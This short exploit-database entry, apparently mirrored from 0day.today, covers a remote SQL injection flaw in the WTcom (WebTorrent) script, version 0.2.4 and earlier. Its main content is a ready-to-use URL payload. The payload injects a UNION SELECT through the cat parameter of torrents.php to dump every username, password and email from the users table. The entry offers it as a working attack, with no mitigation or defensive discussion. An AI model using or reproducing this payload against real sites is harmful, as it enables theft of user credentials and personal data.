id: 703
date: 08/16/2006
title: WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability
author: sh1r081
cves: 

======================================================================
WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability
======================================================================


# WebTorrent (WTcom) Script <= 0.2.4
# ----------------------------------
# >>> Remote SQL Injection
# <<< Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 

http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*



#  0day.today [2023-03-21]  #